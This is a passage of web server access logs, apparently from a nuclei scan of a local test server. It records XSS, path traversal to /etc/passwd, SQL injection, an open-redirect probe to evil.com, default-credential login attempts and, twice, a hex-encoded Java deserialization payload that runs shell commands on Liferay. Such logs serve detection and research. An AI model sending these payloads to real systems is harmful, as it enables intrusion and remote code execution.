"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/static/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /overview.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminer/adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-resources HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 